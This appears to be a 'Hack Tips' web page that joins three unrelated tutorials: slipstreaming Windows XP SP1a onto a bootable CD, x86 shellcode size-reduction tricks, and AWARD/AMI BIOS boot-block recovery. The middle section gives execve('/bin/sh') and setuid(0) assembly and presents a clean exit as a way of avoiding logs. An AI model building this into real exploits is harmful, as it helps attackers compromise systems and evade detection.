Hack Tips

Slipstreaming Windows XP Service Pack 1a and Create Bootable CD

Slipstreaming a Service Pack, is the process to integrate the Service Pack into the installation so that with every new installation the Operating System and Service Pack are installed at the same time.

Slipstreaming is usually done on network shares on corporate systems. But with the advent of CD burners, it does actually make some sense for the home user or small business user to do the same.

Microsoft added the ability to Slipstream a Service Pack to Windows 2000 and Windows XP. It not only has the advantage that when you (re)install your OS, you don’t have to apply the Service Pack later, also if you update any Windows component later, you’ll be sure that you get the correct installation files if Windows needs any.

Slipstream Windows XP Service Pack 1a:
CODE
http://download.microsoft.com/download/5/4/f/54f8bcf8-bb4d-4613-8ee7-db69d01735ed/xpsp1a_en_x86.exe

Download the (full) “Network Install” of the Service Pack (English version [125 MB]), and save it to a directory (folder) on your hard drive (in my case D:\XP-SP1). Other languages can be downloaded from the Windows XP Web site.

Microsoft recently released Windows XP SP1a. The only difference is that this Service Pack does no longer include Microsoft’s dated Java version. If you have already installed Windows XP SP1, there is no reason to install SP1a, but the “older” SP1 (with MS Java) is no longer available for download.

Next copy your Windows XP CD to your hard drive. Just create a folder (I used \XP-CD), and copy all the contents of your Windows XP CD in that folder.

Now create a folder to hold the Service Pack 1a (SP1a) files you are about to extract. I named it \XP-SP1. Next, open a Command Prompt (Start > Run > cmd), and go to the folder where you downloaded SP1a (cd \foldername). Type the command: servicepack filename -x. A small window will appear, and you need to point it to the folder where you want to extract the SP1 files. Click Ok to start extracting the SP1a files.

Once the SP1a files are extracted, change to the update folder of the SP1a files (cd update), and type the following command: update /s:path to WinXP CD files. In my example the command is update /s:D:\XP-CD).

Windows XP Update will do its thing:

When ready, you should get a confirmation. Windows XP Service Pack 1a has now been Slipstreamed into your original Windows XP files.

It is also possible to add the Windows XP Rollup 1 Update. For instructions, please read Adding Windows XP Rollup 1 Hotfix.

Creating a Bootable CD
For this part I used ISO Buster
CODE
http://www.smart-projects.net/isobuster/

and Nero Burning.

Start to extract the boot loader from the original Windows XP CD. Using ISO Buster, select the “folder” Bootable CD, and right-click Microsoft Corporation.img. From the menu choose Extract Microsoft Corporation.img, and extract it to the folder on your hard drive where you have your Windows XP files (D:\XP-CD in my case).

Next, start Nero Burning ROM, and choose CD-ROM (Boot) in the New Compilation window. On the Boot tab, select Image file under Source of boot image data, and browse to the location of the Microsoft Corporation.img file. Also enable Expert Settings, choosing No Emulation, and changing the Number of loaded sectors to 4 (otherwise it won’t boot!)

If you have an older version of Nero you won’t have the option Do Not Add “;1″ ISO file version extention under Relax ISO Restrictions. You won’t be able to boot your new CD, so update Nero!
You can configure the Label tab to your liking, I would however recommend that you keep the Volume Label the same as on your original Windows XP CD.

Next press New, and drag & drop the files and folders from your Windows XP hard drive location into Nero.

Next, burn your new CD.

You now have a Bootable, Slipstreamed Windows XP Service Pack 1a CD!

Introduction

This post assumes a working knowledge of basic shellcoding techniques, and x86 assembly, I will not rehash these in this paper.  I hope to teach you some of the lesser known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes.  I do not claim to have invented any of these techniques, except for the one that uses the div instruction.

The multiplicity of mul

This technique was originally developed by Sorbo of darkircop.net.  The mul instruction may, on the surface, seem mundane, and it’s purpose obvious.  However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful.  First some background information on the mul instruction itself.

mul performs an unsigned multiply of two integers.  It takes only one operand, the other is implicitly specified by the %eax register.  So, a  common mul instruction might look something like this:

movl $0×0a,%eax
mul $0×0a

This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10.  The result is then implicitly stored in EDX:EAX.  The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register(this is also how floating points are stored in some cases, as an interesting sidenote).

So, now comes the ever-important question.  How can we use these attributes to our advantage when writing shellcode?  Well, let’s think for a second, the instruction takes only one operand, therefore, since it is a very common instruction, it will generate only two bytes in our final shellcode.  It multiplies whatever is passed to it by the value stored in %eax, and stores the value in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so, in order to store the result of the multiplication.  Let’s put on our mathematician hats for a second, and consider this, what is the only possible result of a multiplication by 0?  The answer, as you may have guessed, is 0.  I think it’s about time for some example code, so here it is:

xorl %ecx,%ecx
mul %ecx

What is this shellcode doing?  Well, it 0’s out the %ecx register using the xor instruction, so we now know that %ecx is 0.  Then it does a mul %ecx, which as we just learned, multiplies it’s operand by the value in %eax, and then proceeds to store the result of this multiplication in EDX:EAX.  So, regardless of %eax’s previous contents, %eax must now be 0.  However that’s not all, %edx is 0′d now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit(left-most bit) of %eax.  Using this technique we can zero out three registers in only three bytes, whereas by any other method(that I know of) it would have taken at least six.

The div instruction

Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax.  Also like, mul it stores the result of the divide in %eax.  Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction.  But first, let’s think about what is normally stored in the %eax register.  The %eax register holds the return value of functions and/or syscalls.  Most syscalls that are used in shellcoding will return -1(on failure) or a positive value of some kind, only rarely will they return 0(though it does occur).  So, if we know that after a syscall is performed, %eax will have a non-zero value, and that  the instruction divl %eax will divide %eax by itself, and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax.  So…how is this applicable to shellcoding? Well, their is another important thing that %eax is used for, and that is to pass the specific syscall that you would like to call to int $0×80.  It just so happens that the syscall that corresponds to the value 1 is exit().  Now for an example:

orl %ebx,%ebx
mul %ebx
push %edx
pushl   $0×3268732f
pushl   $0×6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
movb $0xb, %al  #execve() syscall, doesn’t return at all unless it fails, in which case it returns -1
int $0×80

divl %eax  # -1 / -1 = 1
int $0×80

Now, we have a 3 byte exit function, where as before it was 5 bytes.  However, there is a catch, what if a syscall does return 0?  Well in the odd situation in which that could happen, you could do many different things, like inc %eax, dec %eax, not %eax anything that will make %eax non-zero.  Some people say that exit’s are not important in shellcode, because your code gets executed regardless of whether or not it exits cleanly.  They are right too, if you really need to save 3 bytes to fit your shellcode in somewhere, the exit() isn’t worth keeping.  However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIG ILL(illegal instruction) which is a rather odd error, and will be logged by the system.  So, an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can’t wipe all the logs, at least this part of your presence will be clear.

Unlocking the power of leal

The leal instruction is an often neglected instruction in shellcode, even though it is quite useful.  Consider this short piece of shellcode.

xorl %ecx,%ecx
leal 0×10(%ecx),%eax

This will load the value 17 into eax, and clear all of the extraneous bits of eax.  This occurs because the leal instruction loads a variable of the type long into it’s desitination operand.  In it’s normal usage, this would load the address of a variable into a register, thus creating a pointer of sorts.  However, since ecx is 0′d and 0+17=17, we load the value 17 into eax instead of any kind of actual address.  In a normal shellcode we would do something like this, to accomplish the same thing:

xorl %eax,%eax
movb $0×10,%eax

I can hear you saying, but that shellcode is a byte shorter than the leal one, and you’re quite right.  However, in a real shellcode you may already have to 0 out a register like ecx(or any other register), so the xorl instruction in the leal shellcode isn’t counted.  Here’s an example:

xorl    %eax,%eax
xorl    %ebx,%ebx
movb    $0×17,%al
int    $0×80

xorl %ebx,%ebx
leal 0×17(%ebx),%al
int $0×80

Both of these shellcodes call setuid(0), but one does it in 7 bytes while the other does it in 8.  Again, I hear you saying but that’s only one byte it doesn’t make that much of a difference, and you’re right, here it doesn’t make much of a difference(except for in shellcode-size pissing contests =p), but when applied to much larger shellcodes, which have many function calls and need to do things like this frequently, it can save quite a bit of space.

Conclusion

I hope you all learned something, and will go out and apply your knowledge to create smaller and better shellcodes.  If you know who invented  the leal technique, please tell me and I will credit him/her.

You don’t need to pay a measly sum of dollars just to recover from a boot block mode. Here it is folks:

AWARD Bootblock recovery

That shorting trick should work if the boot block code is not corrupted, and it should not be if /sb switch is used when flashing the bios (instead of /wb switch).

The 2 pins to short to force a checksum error varies from chip to chip. But these are usually the highest-numbered address pins (A10 and above).

These are the pins used by the system to read the System BIOS (original.bin for award v6), calculate the ROM checksum and see if it’s valid before decompressing it into memory, and subsequently allow Bootblock POST to pass control over to the System BIOS.

You just have to fool the system into believing that the System BIOS is corrupt. This you do by giving your system a hard time reading the System BIOS by shorting the 2 high address pins. And when it could not read the System BIOS properly, ROM Checksum Error is detected “so to speak” and Bootblock recovery is activated.

Sometimes, any combination of the high address pins won’t work to force a checksum error in some chips, like my Winbond W49F002U. But shorting the #WE pin with the highest-numbered address pin (A17) worked for this chip. You just have to be experimentative if you’re not comfortable with “hot flashing” or “replacement BIOS”.

But to avoid further damage to your chip if you’re not sure which are the correct pins to short, measure the potential between the 2 pins by a voltmeter while the system is on. If the voltage reading is zero (or no potential at all), it is safe to short these pins.

But do not short the pins while the system is on. Instead, power down then do the short, then power up while still shorting. And as soon as you hear 3 beeps (1 long, 2 short), remove the short at once so that automatic reflashing from Drive A can proceed without errors (assuming you had autoexec.bat in it).

About how to do the shorting, the tip of a screwdriver would do. But with such minute pins on the PLCC chip, I’m pretty comfortable doing it with the tip of my multi-tester or voltmeter probe. Short the pins at the point where they come out of the chip.

AMIBIOS Recovery bootblock

1. Copy a known working BIOS image for your board to a floppy and rename it to AMIBOOT.ROM.
2. Insert the floppy in your system’s floppydrive.
3. Power on the system while holding CTRL+Home keys. Release the keys when you hear a beep and/or see the floppy light coming on.
4 . Just wait until you hear 4 beeps. When 4 beeps are heard the reprogramming of the System Block BIOS went succesfull, so then you may restart your system.

Some alternative keys that can be used to force BIOS update (only the System Block will be updated so it’s quite safe):
CTRL+Home= restore missing code into system block and clear CMOS when programming went ok.
CTRL+Page Up= restore missing code into system block and clear CMOS or DMI when programming went ok.
CTRL+Page Down= restore missing code into system block and do not clear CMOS and DMI area when programming went ok
Btw: the alternative keys work only with AMIBIOS 7 or higher (so for example an AMI 6.26 BIOS can be only recovered by using CTRL+Home keys).
Boot Block Recovery for FREE

BLACKOUT Flashing

Recovering a Corrupt AMI BIOS chip
With motherboards that use BOOT BLOCK BIOS it is possible to recover a corrupted BIOS because the BOOT BLOCK section of the BIOS, which is responsible for booting the computer remains unmodified. When an AMI BIOS becomes corrupt the system will appear to start, but nothing will appear on the screen, the floppy drive light will come on and the system will access the floppy drive repeatedly. If your motherboard has an ISA slot and you have an old ISA video card lying around, put the ISA video card in your system and connect the monitor. The BOOT BLOCK section of the BIOS only supports ISA video cards, so if you do not have an ISA video card or your motherboard does not have ISA slots, you will have to restore your BIOS blind, with no monitor to show you what’s going on.

AMI has integrated a recovery routine into the BOOT BLOCK of the BIOS, which in the event the BIOS becomes corrupt can be used to restore the BIOS to a working state. The routine is called when the SYSTEM BLOCK of the BIOS is empty. The restore routine will access the floppy drive looking for a BIOS file names AMIBOOT.ROM, this is why the floppy drive light comes on and the drive spins. If the file is found it is loaded into the SYSTEM BLOCK of the BIOS to replace the missing information. To restore your BIOS simply copy a working BIOS file to a floppy diskette and rename it AMIBOOT.ROM, then insert it into the computer while the power is on. The diskette does not need to be bootable or contain a flash utility. After about four minutes the system will beep four times. Remove the floppy diskette from the drive and reboot the computer. The BIOS should now be restored.

Recovering a Corrupt AWARD BIOS

With AWARD BIOS the process is similar but still a bit different. To recover an AWARD BIOS you will need to create a floppy diskette with a working BIOS file in .BIN format, an AWARD flash utility and an AUTOEXEC.BAT file. AWARD BIOS will not automatically restore the BIOS information to the SYSTEM BLOCK for this reason you will need to add the commands necessary to flash the BIOS in the AUTOEXEC.BAT file. The system will run the AUTOEXE.BAT file, which will in turn flash the BIOS. This is fairly easy. Here are the steps you need to take.

· Create a bootable floppy diskette
· Copy the BIOS file and flash utility to the diskette
· Create an text file with any standard text editor and add the following lines

@ECHO OFF
FLASH763 BIOSFILE.BIN /py

In the above example I am assuming that you are using the FLASH763.EXE flash utility. You will need to replace the FLASH763 with the name of whatever flash utility you are using, and replace the BIOSFILE.BIN with the name of the BIOS file you are using. You will also need to change the ‘/py’ to whatever the command is for your flash utility to automatically program the BIOS without user intervention. If you do not know the command to automatically flash your BIOS type the name of the flash utility with a space and then /? to display the utility’s help screen. The help screen should pecify the command switch to automatically flash your BIOS. If you are using the FLASH763.EXE utility then the switch to automatically flash your BIOS is ‘/py’.